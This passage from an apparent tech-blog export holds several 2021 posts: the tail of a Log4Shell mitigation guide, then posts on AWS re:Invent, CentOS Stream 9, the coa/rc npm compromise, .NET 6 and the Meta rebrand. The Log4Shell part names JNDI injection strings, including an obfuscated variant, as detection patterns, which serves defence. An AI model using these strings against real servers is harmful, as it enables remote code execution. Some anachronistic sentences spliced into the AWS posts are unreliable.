Don\u0026rsquo;t forget to check your Docker images, your CI/CD tools (Jenkins uses Java!), and any commercial software running on your infrastructure.\n2. Upgrade Log4j to 2.15.0 wherever possible. This is the definitive fix. The release disables JNDI lookup by default.\n3. If you can\u0026rsquo;t upgrade immediately, apply the mitigation. For Log4j 2.10+, set the system property log4j2.formatMsgNoLookups=true or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true. For older versions, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.\n4. Monitor your WAF and IDS for strings containing ${jndi:. Be aware that obfuscation is possible — attackers are already using nested lookups like ${${lower:j}ndi: to bypass simple pattern matching.\n5. Assume compromise if you were running vulnerable versions exposed to the internet. Check for unusual outbound connections, new cron jobs, or unfamiliar processes.\nThe Transitive Dependency Problem # This vulnerability lays bare something I\u0026rsquo;ve been concerned about for years: the software supply chain problem. Modern applications don\u0026rsquo;t just have dependencies — they have dependency graphs that are impossibly complex to audit manually.\nA typical enterprise Java application might have 200+ transitive dependencies. Most developers couldn\u0026rsquo;t name more than a dozen of them. We implicitly trust that every single one of those libraries is secure, maintained, and doesn\u0026rsquo;t do anything unexpected. Log4Shell proves how dangerous that assumption is.\nWe need better tooling for dependency auditing. Solutions like Snyk, Dependabot, and OWASP Dependency-Check exist, but adoption is inconsistent. After this week, I expect that to change rapidly.\nMy Take # I\u0026rsquo;m writing this at my desk on a Thursday evening when I should be winding down for the week. 
Instead, like thousands of other engineers around the world, I\u0026rsquo;m patching systems and auditing dependencies. That\u0026rsquo;s the reality of a 10.0 CVSS vulnerability in ubiquitous software.\nWhat frustrates me most isn\u0026rsquo;t the vulnerability itself — bugs happen, even in well-maintained projects. What frustrates me is that the JNDI lookup feature that enables this exploit has been a known risk vector for years. The Log4j library was doing something incredibly powerful (and dangerous) by default, and the Java ecosystem collectively shrugged.\nThis is going to be a long week for a lot of teams. If you\u0026rsquo;re in the thick of it: document what you\u0026rsquo;re doing, communicate clearly with your stakeholders, and don\u0026rsquo;t skip the \u0026ldquo;assume compromise\u0026rdquo; step. The scanners were active before the CVE was even published.\nPatch now. Audit everything. And when the dust settles, we need to have a serious conversation about software supply chain security. This won\u0026rsquo;t be the last time a transitive dependency ruins everyone\u0026rsquo;s weekend.\n","date":"9 December 2021","externalUrl":null,"permalink":"/posts/211209-log4shell-zero-day/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A critical remote code execution vulnerability in Apache Log4j has sent the entire industry scrambling. Here’s what you need to know and do right now.","title":"Log4Shell — The Zero-Day That Broke the Internet's Weekend","type":"posts"},{"content":"AWS re:Invent is always a firehose of announcements, and this year\u0026rsquo;s edition in Las Vegas didn\u0026rsquo;t disappoint. After a virtual-only event last year, being back in person (with a hybrid option) felt like a statement in itself. 
But the real statement came from the product launches — AWS is clearly betting on making cloud infrastructure more opinionated, more abstracted, and more accessible to developers who\u0026rsquo;d rather not think about servers at all.\nThe Serverless Push Gets Serious # The biggest theme I picked up from the keynotes is AWS doubling down on serverless, but not just Lambda-style functions. We\u0026rsquo;re talking about serverless everything. The new SageMaker Serverless Inference offering lets you deploy ML models without provisioning instances. Amazon Redshift Serverless removes capacity planning from data warehousing. Even Amazon EMR is getting a serverless option.\nThis matters because it signals a shift in how AWS thinks about its own platform. This evolution continued through AWS re:Invent 2024. For years, EC2 was the foundation and everything else was a layer on top. Now, the foundation is increasingly the managed service itself. You don\u0026rsquo;t configure the compute — you describe the workload.\nFor those of us who\u0026rsquo;ve been building on AWS since the early days, this is both exciting and slightly terrifying. Exciting because it genuinely reduces operational overhead. Terrifying because each new abstraction is another layer of vendor lock-in that gets harder to replicate elsewhere.\nAWS Amplify Studio and the Developer Experience Play # One announcement that caught my eye was AWS Amplify Studio, a visual development environment that lets you build full-stack apps with a Figma-to-code workflow. You design your UI in Figma, connect it to a backend data model, and Amplify generates React components.\nI\u0026rsquo;ve been in this industry long enough to have a healthy skepticism about \u0026ldquo;visual development\u0026rdquo; tools. We\u0026rsquo;ve seen this movie before — from Dreamweaver to various low-code platforms. But Amplify Studio feels different because it doesn\u0026rsquo;t try to replace code. 
It generates standard React components that you can customize. It\u0026rsquo;s opinionated about the starting point but doesn\u0026rsquo;t lock you into a proprietary runtime.\nWhether this actually works well in practice remains to be seen. The demos were polished, as they always are at re:Invent. The real test is whether a team of three developers building a SaaS product finds this faster than their current workflow.\nGraviton3 and the ARM Architecture Bet # On the infrastructure side, the Graviton3 processor announcement was significant. AWS claims 25% better compute performance over Graviton2, with up to 2x better floating-point performance and support for DDR5 memory. The new C7g instances powered by Graviton3 are already in preview.\nThis is the third generation of AWS\u0026rsquo;s custom ARM chips, and the trajectory is clear. AWS is building its own silicon because it can offer better price-performance than Intel or AMD for many workloads. As someone who remembers when ARM in the server room sounded like science fiction, the speed of this transition is remarkable.\nThe practical implication for developers: if you\u0026rsquo;re not testing your workloads on Graviton instances, you\u0026rsquo;re likely leaving money on the table. Infrastructure choices around custom silicon became increasingly central to cloud strategy. Most containerized workloads and interpreted languages (Python, Node.js, Java) run without modification. Native compiled code needs an ARM build, but CI/CD pipelines handle that easily enough.\nThe Data Fabric Emerges # Several announcements pointed toward what I\u0026rsquo;d call AWS\u0026rsquo;s \u0026ldquo;data fabric\u0026rdquo; strategy. 
The new AWS Lake Formation governed tables, S3 Object Lambda for transforming data on read, and tighter integration between Redshift, Athena, and SageMaker all paint a picture of data flowing more freely between services without ETL overhead.\nThis resonates with a pattern I\u0026rsquo;ve been seeing across client projects: organizations drowning in data pipelines. Every team builds their own Extract-Transform-Load process, and before you know it you have dozens of pipelines moving data between services that are all running in the same cloud provider. If AWS can genuinely reduce that plumbing, it\u0026rsquo;s a real productivity win. The data infrastructure evolution shows how these patterns matured.\nMy Take # re:Invent 2021 felt like a maturation moment for AWS. The announcements weren\u0026rsquo;t about launching revolutionary new categories — they were about making existing categories easier to use, more integrated, and more serverless. That\u0026rsquo;s not as exciting for a keynote headline, but it\u0026rsquo;s exactly what most development teams actually need.\nThe subtext I\u0026rsquo;m reading is that AWS knows its biggest competitor isn\u0026rsquo;t Azure or GCP — it\u0026rsquo;s the complexity of its own platform. With over 200 services, the cognitive load of choosing the right AWS service for a task has become a genuine barrier. By making services more opinionated and integrated, they\u0026rsquo;re trying to reduce that decision fatigue.\nMy advice if you\u0026rsquo;re an AWS shop: look seriously at the Graviton3 instances for cost savings, evaluate whether Amplify Studio fits your frontend workflow, and start thinking about serverless-first for new workloads. The pricing model increasingly favors it, and the operational simplification is real.\nThe cloud keeps getting more abstract. Whether that\u0026rsquo;s a good thing depends entirely on whether you trust your cloud provider. 
After this re:Invent, AWS is certainly asking for more of that trust.\n","date":"2 December 2021","externalUrl":null,"permalink":"/posts/211202-aws-reinvent-2021-cloud-abstractions/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Invent 2021 delivered a clear message: the cloud is moving toward higher-level abstractions, and developers should pay attention.","title":"AWS re:Invent 2021 — The Cloud Just Got More Opinionated","type":"posts"},{"content":"AWS re:Invent is back in person this week after last year\u0026rsquo;s fully virtual event, and Las Vegas is once again filled with cloud engineers comparing badge ribbons. I\u0026rsquo;ve been following the announcements remotely, and while the full keynote slate is still ahead of us, the pre-conference launches and early sessions are already revealing where Amazon sees cloud infrastructure heading.\nThis year\u0026rsquo;s event comes at an interesting moment. Cloud adoption accelerated dramatically during the pandemic, and many organisations are now past the \u0026ldquo;lift and shift\u0026rdquo; phase and into the \u0026ldquo;how do we actually operate efficiently in the cloud\u0026rdquo; phase. The announcements so far reflect that maturity shift.\nThe Serverless Story Continues # AWS has been steadily expanding the serverless model beyond Lambda functions, and the direction is clear: they want serverless to be the default deployment model, not the exception.\nLambda itself has seen incremental improvements throughout 2021 — longer execution times, larger ephemeral storage, better cold start performance. But the more interesting story is how serverless thinking is permeating other services.\nAmazon Aurora Serverless v2 has been in preview, and the general availability is anticipated soon. The promise of a relational database that scales to zero and handles burst traffic without pre-provisioning is compelling. 
The evolution of serverless data services would continue to mature these capabilities. I\u0026rsquo;ve been running Aurora Serverless v1 for low-traffic applications, and while v1 had painful cold start issues (30+ seconds to wake up), the v2 architecture is fundamentally different — it scales in increments of 0.5 ACUs and can go from idle to full capacity in under a second.\nAWS App Runner, launched earlier this year, is Amazon\u0026rsquo;s answer to the \u0026ldquo;I just want to deploy a container without thinking about infrastructure\u0026rdquo; use case. This approach aligns with later platform engineering trends around developer experience. It\u0026rsquo;s not as mature as Google Cloud Run or Azure Container Apps, but it represents AWS acknowledging that not every team wants to configure VPCs, load balancers, and auto-scaling groups just to run a web service.\nGraviton and the ARM Transition # One of the more consequential stories at this year\u0026rsquo;s re:Invent is the continued expansion of AWS Graviton processors. The Graviton2-based instances have been available for over a year now, and the performance-per-dollar advantage is real — roughly 40% better price-performance compared to equivalent x86 instances for many workloads.\nGraviton3 is expected to be announced this week, and early indicators suggest another significant performance jump. For developers, this means taking ARM compatibility seriously if you haven\u0026rsquo;t already. Custom silicon strategies continued to evolve across cloud providers.\nIn practice, most modern application stacks work fine on ARM64. If you\u0026rsquo;re running containerised workloads with interpreted languages (Python, Node.js, Ruby), the switch is often as simple as building multi-architecture Docker images. 
Compiled languages need ARM64 builds, but Go, Rust, and .NET all have excellent cross-compilation support.\nWhere teams run into issues is with native dependencies — packages that include compiled C/C++ extensions. In the Node.js world, packages like sharp, bcrypt, and node-sass have ARM64 variants, but you occasionally hit a library that doesn\u0026rsquo;t. It\u0026rsquo;s worth auditing your dependency tree now.\nThe cost savings are significant enough that I\u0026rsquo;d recommend every team at least test their workloads on Graviton instances. For compute-heavy batch processing and containerised microservices, switching to Graviton can reduce your EC2 bill by 20-40%.\nObservability and the Operational Gap # A recurring theme in the sessions I\u0026rsquo;ve been following is observability. AWS has been investing in CloudWatch, X-Ray, and the recently launched CloudWatch Evidently and CloudWatch RUM (Real User Monitoring). The message is clear: as architectures become more distributed, understanding what\u0026rsquo;s happening in production becomes harder and more important.\nThe challenge for AWS has always been that their native observability tools lag behind dedicated platforms like Datadog, New Relic, and Grafana Cloud. CloudWatch metrics are essential, but the dashboarding and alerting experience remains clunky compared to third-party alternatives.\nWhat\u0026rsquo;s encouraging is the OpenTelemetry adoption. AWS has been contributing to OpenTelemetry and supporting the AWS Distro for OpenTelemetry (ADOT) as a first-class option. The maturity of OpenTelemetry as a standard has transformed observability practices. This is the right approach — standardise on open instrumentation protocols and let teams choose their analysis backend. 
I\u0026rsquo;ve been migrating several projects from X-Ray-specific instrumentation to OpenTelemetry, and the flexibility is worth the effort.\nCost Management: The Unsexy Essential # Among the less headline-grabbing but critically important developments is AWS\u0026rsquo;s continued investment in cost management tooling. The new Cost Anomaly Detection uses machine learning to identify unexpected spending patterns, and Savings Plans now cover more service categories.\nThis matters because cloud cost management is the number one operational concern I hear from engineering teams. The pay-as-you-go model that makes cloud attractive also makes it unpredictable. I\u0026rsquo;ve seen startups get bill shock from a misconfigured auto-scaling group or a forgotten development environment running over a weekend.\nIf you\u0026rsquo;re running any significant AWS workload and not using Cost Explorer with budgets and alerts, you\u0026rsquo;re flying blind. Cloud cost optimization and FinOps became increasingly critical as AWS complexity grew. It\u0026rsquo;s not glamorous work, but it\u0026rsquo;s the kind of infrastructure discipline that separates mature cloud operations from expensive experiments.\nMy Take # re:Invent has become so large that it\u0026rsquo;s impossible to absorb everything in real-time. Hundreds of announcements across dozens of services, many of them incremental improvements that individually seem minor but collectively reshape how we build software.\nThe trends I\u0026rsquo;m watching most closely are the serverless expansion (particularly Aurora Serverless v2), the Graviton processor line, and the OpenTelemetry adoption. These represent genuine improvements in cost, performance, and operational sanity — the things that matter when you\u0026rsquo;re actually running production workloads, not just building demos.\nI\u0026rsquo;ll be diving deeper into specific announcements as the keynotes roll out over the coming days. 
For now, if you\u0026rsquo;re not at re:Invent, the livestreams and session recordings are excellent. And if you are there — stay hydrated, wear comfortable shoes, and remember that the expo hall is not a viable lunch strategy despite the amount of free snacks available.\n","date":"25 November 2021","externalUrl":null,"permalink":"/posts/211125-aws-reinvent-2021-serverless-evolution/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Invent 2021 is underway in Las Vegas, and the announcements already hint at where cloud infrastructure is headed next.","title":"AWS re:Invent 2021 Kicks Off — Serverless and the Cloud Keep Evolving","type":"posts"},{"content":"CentOS Stream 9 was released this week, marking the next chapter in what has been one of the most contentious decisions in recent open-source history. If you\u0026rsquo;ve been managing Linux servers for any length of time, you\u0026rsquo;ve likely had opinions about this since Red Hat announced the shift from traditional CentOS to CentOS Stream in December 2020.\nI\u0026rsquo;ve run CentOS in production environments since version 4. The announcement that CentOS 8 would reach end-of-life on December 31, 2021 — years earlier than expected — forced a lot of us to rethink our infrastructure strategies. With Stream 9 now available, it\u0026rsquo;s worth examining where things stand.\nWhat CentOS Stream 9 Actually Is # For those who haven\u0026rsquo;t followed the saga, here\u0026rsquo;s the short version: traditional CentOS was a downstream rebuild of Red Hat Enterprise Linux (RHEL). RHEL would release, and CentOS would rebuild it from the source RPMs, giving you a binary-compatible, free alternative. CentOS Stream flips this relationship — it sits upstream of RHEL, serving as a rolling preview of the next RHEL minor release.\nCentOS Stream 9 tracks what will become RHEL 9, which is based on Fedora 34. 
This means:\nKernel 5.14 with significant improvements to cgroups v2, BPF, and io_uring\nGCC 11 as the default compiler, with C++17 fully supported\nPython 3.9 as the system Python\nOpenSSL 3.0, which is a major upgrade with implications for any TLS-dependent workload\nPodman 4.x previews, continuing Red Hat\u0026rsquo;s push away from Docker\nThe technical foundations are solid. The question has always been whether the Stream model is suitable for production workloads.\nThe Trust Problem # The backlash against the CentOS Stream shift was never really about the technical merits. It was about trust and expectations. Thousands of organisations built their infrastructure on the understanding that CentOS was a stable, RHEL-compatible platform with a predictable lifecycle. Changing that social contract — especially accelerating CentOS 8\u0026rsquo;s EOL — felt like a betrayal.\nRed Hat\u0026rsquo;s argument is that CentOS Stream is more useful, not less. By contributing to Stream, you directly influence what goes into RHEL. Bugs you find and report in Stream get fixed before they reach the enterprise release. In theory, this is a better model for the community.\nIn practice, many sysadmins and infrastructure teams need stability guarantees, not influence over upstream. When your job is keeping production systems running, \u0026ldquo;rolling preview of the next minor release\u0026rdquo; is not reassuring language.\nThe Alternatives Have Matured # The silver lining of the CentOS saga is that it catalysed the creation of genuine alternatives:\nAlmaLinux, backed by CloudLinux, released its 8.x line in March 2021 and has been delivering point releases reliably. They\u0026rsquo;ve been transparent about their build process and governance, and they\u0026rsquo;ve attracted significant community support.\nRocky Linux, founded by CentOS co-creator Gregory Kurtzer, had its first stable release in June 2021. 
Rocky\u0026rsquo;s pitch is explicitly \u0026ldquo;what CentOS used to be\u0026rdquo; — a downstream RHEL rebuild with long-term stability.\nBoth projects are now established enough that they\u0026rsquo;re viable for production use. I\u0026rsquo;ve been testing AlmaLinux 8.5 in staging environments, and the compatibility with RHEL has been flawless so far. The migration path from CentOS 8 is straightforward — both projects provide conversion scripts that handle the transition in place.\nOracle Linux also deserves mention. It\u0026rsquo;s been around for years as a RHEL rebuild, and Oracle has been using the CentOS upheaval to promote it. The \u0026ldquo;Unbreakable Enterprise Kernel\u0026rdquo; is genuinely good, though Oracle\u0026rsquo;s reputation in the open-source community gives many people pause.\nWhat This Means for Your Infrastructure # If you\u0026rsquo;re still running CentOS 8, the clock is ticking. December 31, 2021, is just six weeks away, and after that, you stop receiving security updates. Here\u0026rsquo;s my pragmatic advice:\nFor existing CentOS 8 systems: Migrate to AlmaLinux or Rocky Linux. Both offer in-place migration tools. Test thoroughly in staging first, but the process is well-documented and well-tested by now.\nFor new deployments: If you need RHEL compatibility, choose AlmaLinux or Rocky based on your preference. If you\u0026rsquo;re open to a different approach, consider whether you actually need an enterprise Linux distribution at all. For containerised workloads, minimalist base images (Alpine, distroless) often make more sense.\nFor CentOS Stream: It has a legitimate place in development and testing environments where you want early access to what\u0026rsquo;s coming in the next RHEL release. 
I wouldn\u0026rsquo;t run it for customer-facing production workloads yet, but for CI/CD environments and internal tooling, it\u0026rsquo;s perfectly reasonable.\nMy Take # The CentOS Stream transition has been handled poorly from a communications perspective, but the resulting ecosystem might actually be healthier than what we had before. Instead of one community rebuild that everyone depended on, we now have multiple well-funded alternatives with different governance models.\nCompetition and choice are good for the enterprise Linux ecosystem. AlmaLinux and Rocky Linux have both demonstrated they can deliver timely, compatible rebuilds. CentOS Stream serves a different purpose — one that\u0026rsquo;s genuinely useful for developers and contributors even if it\u0026rsquo;s not what production sysadmins wanted.\nWhat I find most encouraging is the speed at which the community responded. Within months of Red Hat\u0026rsquo;s announcement, we had multiple viable alternatives. That\u0026rsquo;s the open-source ecosystem working exactly as it should — when one path closes, the community builds new ones.\nThe enterprise Linux landscape is more fragmented now than it\u0026rsquo;s been in years. But fragmented doesn\u0026rsquo;t mean broken. It means we have options. And after depending on a single free RHEL rebuild for nearly two decades, having options feels like progress.\n","date":"18 November 2021","externalUrl":null,"permalink":"/posts/211118-centos-stream-9-enterprise-linux-shift/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CentOS Stream 9 has arrived as the successor to both CentOS 8 and the traditional CentOS model — and the enterprise Linux community is still adapting.","title":"CentOS Stream 9 Lands — The Enterprise Linux Landscape Keeps Shifting","type":"posts"},{"content":"If you\u0026rsquo;re a JavaScript developer and your CI/CD pipeline started failing around November 4th, you\u0026rsquo;re not alone. 
Two widely-used npm packages — coa (a command-line option parser with 9 million weekly downloads) and rc (a configuration loader with 14 million weekly downloads) — were compromised. Malicious versions were published that attempted to steal passwords and install cryptominers.\nThis comes barely two weeks after the ua-parser-js incident that I wrote about recently. The npm ecosystem is having a very bad autumn, and the pattern is becoming impossible to ignore.\nWhat Happened # The attack followed a depressingly familiar pattern. The npm accounts of the package maintainers were compromised — likely through credential reuse or phishing — and the attackers published new versions containing malicious code.\nFor coa, versions 2.0.3, 2.0.4, 2.1.1, 2.1.3, and 3.0.1 were published on November 4th. For rc, versions 1.2.9, 1.3.9, and 2.3.9 appeared shortly after. The malicious code was obfuscated but, when analysed, was found to:\nDetect the operating system\nDownload a platform-specific binary from a remote server\nExecute the binary, which functioned as a password stealer (specifically targeting Chrome and Firefox stored credentials)\nOn some variants, install a cryptocurrency miner\nThe npm security team acted relatively quickly, unpublishing the compromised versions within hours. But \u0026ldquo;within hours\u0026rdquo; in npm-land means potentially millions of installations.\nWhy This Keeps Happening # The fundamental issue hasn\u0026rsquo;t changed since I first started writing about npm supply chain risks: the JavaScript ecosystem has a deep dependency problem, and the security model hasn\u0026rsquo;t kept pace.\nAccount security is the weakest link. npm has offered two-factor authentication since 2017, but it\u0026rsquo;s not mandatory — even for packages with millions of dependents. After the ua-parser-js incident, npm announced plans to require 2FA for maintainers of high-impact packages. 
But that\u0026rsquo;s not implemented yet, and coa and rc were compromised in the gap.\nDependency depth amplifies blast radius. Both coa and rc are transitive dependencies pulled in by popular tools. coa is a dependency of css-loader and svgo, which are dependencies of create-react-app. If you ran npx create-react-app during the window of compromise, you were affected. The average npm project has hundreds of transitive dependencies, and most developers couldn\u0026rsquo;t name half of them.\nVersion ranges make it worse. Many package.json files use semver ranges like ^1.2.8, which automatically install newer minor and patch versions. The attackers exploited this by publishing versions that fell within common semver ranges. If your lockfile wasn\u0026rsquo;t committed (and you\u0026rsquo;d be surprised how many projects don\u0026rsquo;t commit lockfiles), npm install would happily pull the malicious version.\nPractical Defences # I\u0026rsquo;ve been hardening Node.js build pipelines for years, and here\u0026rsquo;s what I recommend today:\nAlways commit your lockfile. Whether it\u0026rsquo;s package-lock.json or yarn.lock, it belongs in version control. This pins your transitive dependencies to exact versions and prevents surprise upgrades.\nUse npm ci instead of npm install in CI/CD. The ci command installs exactly what\u0026rsquo;s in the lockfile and fails if the lockfile is out of sync with package.json. It\u0026rsquo;s faster and more deterministic.\nAudit regularly, but don\u0026rsquo;t rely on it. npm audit catches known vulnerabilities in published advisories, but these supply chain attacks are zero-days — there\u0026rsquo;s no advisory until after the compromise is discovered. Audit is necessary but not sufficient.\nConsider package pinning for critical dependencies. Tools like Socket and Snyk are beginning to offer supply chain detection that goes beyond known vulnerability databases. 
They analyse package behaviour changes between versions, which would have flagged the coa and rc attacks.\nEvaluate alternatives to deep dependency trees. This is the hardest advice to follow, but it\u0026rsquo;s the most effective. Every dependency you add is a trust relationship. Every transitive dependency is a trust relationship you didn\u0026rsquo;t explicitly choose. Consider whether you really need that utility library, or whether a few lines of your own code would serve better.\nMy Take # Three major npm supply chain attacks in the space of a month (ua-parser-js, coa, rc) isn\u0026rsquo;t a coincidence — it\u0026rsquo;s a campaign. The JavaScript ecosystem\u0026rsquo;s popularity and its dependency model make it the highest-value target for supply chain attacks in the software world.\nGitHub and npm are starting to take this seriously. The upcoming 2FA requirements for top packages are a good step. But we need more fundamental changes: better provenance tracking, package signing, and reproducible builds. The Sigstore project and npm\u0026rsquo;s own plans for package signing give me some hope.\nIn the meantime, treat your node_modules directory like what it is: a collection of code from thousands of strangers that runs with full access to your system. Lock your dependencies, monitor for anomalies, and think twice before adding that next npm install.\nThe npm ecosystem\u0026rsquo;s greatest strength — its vast package registry and frictionless dependency management — is also its greatest vulnerability. 
Until the security model catches up with the scale, these attacks will continue.\n","date":"11 November 2021","externalUrl":null,"permalink":"/posts/211111-npm-coa-rc-supply-chain-attacks/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Popular npm packages coa and rc were hijacked to distribute malware, impacting thousands of projects and raising urgent questions about supply chain security.","title":"npm Supply Chain Under Siege — The coa and rc Package Compromises","type":"posts"},{"content":"Microsoft\u0026rsquo;s .NET Conf 2021 is just days away, and the .NET 6 release candidates have been painting a clear picture: this is the release where Microsoft\u0026rsquo;s \u0026ldquo;One .NET\u0026rdquo; vision actually comes together. After years of transition — from .NET Framework to .NET Core, through the awkward .NET 5 renumbering — version 6 is shaping up to be the most significant .NET release in years.\nI\u0026rsquo;ve been working with .NET since the original framework shipped in 2002. I\u0026rsquo;ve lived through every major transition, including the painful years of maintaining parallel .NET Framework and .NET Core applications. .NET 6 feels like the release that finally lets us stop qualifying which .NET we\u0026rsquo;re talking about.\nWhat Makes .NET 6 Different # The headline feature is Long-Term Support (LTS). .NET 5 was a \u0026ldquo;Current\u0026rdquo; release with just 18 months of support, which made it a tough sell for enterprise adoption. .NET 6 gets three years of support, making it the natural migration target for organisations still running .NET Framework or older .NET Core versions.\nBut LTS status alone doesn\u0026rsquo;t make a release exciting. The performance improvements do. The .NET team has been methodically benchmarking and optimising, and the results from RC2 are remarkable:\nMinimal APIs reduce the ceremony of building HTTP services to almost nothing. 
A complete web API in six lines of code isn\u0026rsquo;t just a demo trick — it signals a genuine rethinking of how .NET approaches simplicity.\nHot Reload finally works properly across the stack, letting you modify C# code and see changes reflected without restarting the application. This has been standard in interpreted language ecosystems for years, so it\u0026rsquo;s about time.\nPGO (Profile-Guided Optimisation) as a runtime feature means the JIT compiler can optimise based on actual usage patterns. Dynamic PGO is still experimental, but initial benchmarks show 20-30% throughput improvements in some workloads.\nMAUI (Multi-platform App UI) brings cross-platform native application development to .NET, though it\u0026rsquo;ll ship separately as it needs more baking time.\nThe C# 10 Improvements Matter # .NET 6 ships with C# 10, and while individual language features rarely change how you work, the cumulative effect here is notable. Global usings and file-scoped namespaces reduce boilerplate significantly. A typical C# file used to start with 10-15 lines of using statements and namespace declarations. Now it can start with your actual code.\n// Before: ceremony\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\n\nnamespace MyApp.Services\n{\n    public class UserService\n    {\n        // ...\n    }\n}\n\n// After: just code\npublic class UserService\n{\n    // ...\n}\nRecord structs extend the record pattern to value types, which is excellent for high-performance scenarios where you want immutability semantics without heap allocations. For developers building APIs that handle high throughput — which is increasingly all of us — this matters.\nPerformance: The Real Story # The TechEmpower benchmarks have been tracking .NET\u0026rsquo;s performance trajectory, and it\u0026rsquo;s been consistently climbing. 
.NET 6 puts C# in genuine competition with Go and Rust for web server workloads, which would have been laughable a decade ago.\nThe System.Text.Json improvements alone are worth the upgrade. JSON serialisation is the bread and butter of API development, and the source generators in .NET 6 eliminate reflection-based serialisation overhead entirely. You get compile-time generated serialisers that are significantly faster and produce less garbage collection pressure.\nThe .NET team has also invested heavily in Span\u0026lt;T\u0026gt; and Memory\u0026lt;T\u0026gt; adoption throughout the base class libraries. The result is less allocation, less copying, and better throughput across the board. FileStream has been completely rewritten on both Windows and Linux for better async I/O performance.\nMy Take # .NET 6 represents Microsoft delivering on a promise that took nearly six years to fulfil. The journey from \u0026ldquo;.NET Core is the future\u0026rdquo; at .NET Conf 2016 to \u0026ldquo;here\u0026rsquo;s the unified platform\u0026rdquo; has been longer and bumpier than anyone wanted, but the destination is genuinely good.\nIf you\u0026rsquo;re still on .NET Framework, this is your migration target. If you\u0026rsquo;re on .NET Core 3.1 (which goes out of support next December), start planning your upgrade now. The migration tooling has improved dramatically, and most libraries have caught up.\nWhat impresses me most isn\u0026rsquo;t any single feature — it\u0026rsquo;s the coherence. Minimal APIs, Hot Reload, C# 10 improvements, and performance gains all point in the same direction: making .NET development faster, simpler, and more productive. Microsoft has been listening to what developers actually want, and it shows.\nThe .NET ecosystem hasn\u0026rsquo;t been this healthy in years. With .NET 6, I\u0026rsquo;d argue it\u0026rsquo;s one of the strongest general-purpose development platforms available. 
Whether you\u0026rsquo;re building APIs, desktop apps, mobile clients, or cloud services, there\u0026rsquo;s now a single, performant, well-supported framework that handles all of it. That\u0026rsquo;s what \u0026ldquo;One .NET\u0026rdquo; always meant, and it\u0026rsquo;s finally here.\n","date":"4 November 2021","externalUrl":null,"permalink":"/posts/211104-dotnet6-release-unified-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With .NET 6 approaching release at .NET Conf, Microsoft finally delivers on its promise of a single unified platform — and it’s genuinely impressive.","title":".NET 6 Arrives — The Unified Platform Microsoft Has Been Promising","type":"posts"},{"content":"Yesterday, Mark Zuckerberg stood on a virtual stage and announced that Facebook — the company, not the app — is now called Meta. The stock ticker changes to MVRS in December. The stated mission: building the metaverse, an interconnected set of immersive digital experiences that supposedly represents the next evolution of social technology.\nI\u0026rsquo;ve been in this industry long enough to have seen several \u0026ldquo;next big platform\u0026rdquo; declarations. Some panned out (mobile, cloud). Some didn\u0026rsquo;t (Google Glass, Second Life in its original incarnation). The Meta rebrand sits in an interesting middle ground — it\u0026rsquo;s simultaneously a distraction from very real PR problems and a genuine multi-billion-dollar engineering commitment.\nThe Infrastructure Implications Are Real # Whatever you think of the metaverse pitch, the underlying engineering challenges are staggering. Zuckerberg talked about persistent shared spaces, real-time rendering at scale, and cross-platform interoperability. Each of these is a distributed systems problem of enormous complexity.\nConsider just the networking layer. Current VR experiences are largely single-player or small-group affairs running on dedicated servers. 
A persistent shared world with millions of concurrent users requires edge computing infrastructure that doesn\u0026rsquo;t fully exist yet. Facebook — sorry, Meta — is already one of the largest infrastructure operators on the planet. They\u0026rsquo;re signaling they intend to get even larger.\nTheir Reality Labs division reportedly has 10,000 people working on AR and VR projects. The company has committed to spending roughly $10 billion on metaverse development this year alone. That\u0026rsquo;s not pocket change, even for a company with Meta\u0026rsquo;s revenue.\nWhat Developers Should Actually Pay Attention To # If you strip away the marketing and the awkward demos of legless avatars in virtual meeting rooms, there are some genuinely interesting technical developments happening here:\nSpatial computing SDKs: The Presence Platform announced at Connect includes new APIs for mixed reality development on Quest devices. The Interaction SDK and Passthrough API hint at a world where AR/VR development becomes more accessible to mainstream developers, not just graphics specialists.\nAI and computer vision: The metaverse pitch relies heavily on advances in real-time environment understanding, hand tracking, eye tracking, and natural language processing. Meta\u0026rsquo;s AI research division (FAIR) has been publishing solid work in these areas, and more of it is likely to get productized.\nOpen standards: Interestingly, Meta has been talking about open standards and interoperability for the metaverse. They\u0026rsquo;re part of the Khronos Group working on OpenXR. Whether they follow through on openness when money is on the line remains to be seen, but the rhetoric is encouraging.\nThe Elephant in the (Virtual) Room # I can\u0026rsquo;t write about this without addressing the obvious: this rebrand lands amid a torrent of negative press. 
The Facebook Papers, leaked by Frances Haugen, paint a damning picture of a company that prioritises engagement metrics over user safety. Renaming yourself doesn\u0026rsquo;t fix that.\nFrom a technical ethics perspective, the metaverse raises the same concerns at a higher magnitude. If Facebook struggled to moderate text posts and 2D images, how do they plan to moderate real-time 3D interactions? The harassment problems in VR spaces are already well-documented. Scaling those spaces up by orders of magnitude without solving moderation first seems reckless.\nAs engineers, we have to think about these things. The technical challenges of building the metaverse are fascinating. But \u0026ldquo;can we build it?\u0026rdquo; and \u0026ldquo;should we build it this way?\u0026rdquo; are different questions.\nMy Take # I think the metaverse — or something like it — will eventually exist. But I\u0026rsquo;m skeptical it\u0026rsquo;ll look like what Zuckerberg presented. The most transformative platforms tend to emerge bottom-up from open ecosystems, not top-down from a single corporation\u0026rsquo;s vision.\nWhat I\u0026rsquo;m watching closely is the infrastructure layer. The compute, networking, and rendering technologies being developed for metaverse applications will have applications far beyond virtual meeting rooms. Real-time collaborative 3D environments have obvious use cases in engineering, medicine, education, and remote work that don\u0026rsquo;t require buying into the full metaverse vision.\nFor now, I\u0026rsquo;d recommend developers keep an eye on the SDKs and APIs coming out of Meta\u0026rsquo;s platform, explore WebXR if you haven\u0026rsquo;t already, and remember that the most valuable skills in any platform shift are the fundamentals: distributed systems, networking, and clean API design.\nThe name change is marketing. The $10 billion annual investment is engineering. 
